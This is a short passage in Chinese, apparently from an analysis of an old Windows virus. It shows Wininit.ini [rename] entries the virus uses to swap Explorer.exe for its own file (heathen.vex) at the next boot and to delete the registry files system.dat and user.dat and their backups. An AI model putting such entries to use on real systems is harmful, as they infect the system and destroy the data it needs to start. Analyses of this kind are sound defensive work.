例如:[rename]
c:\windows\explorer.exe=c:\windows\heathen.vex
下次启动时,Windows将帮助它完成对Explorer.exe的感染。另外,该病毒发作时也使Wininit.ini来删除Windows注册表文件。
[rename]
nul=c:\windows\system.dat
nul=c:\windows\user.dat
nul=c:\windows\system.da0
nul=c:\windows\user.da0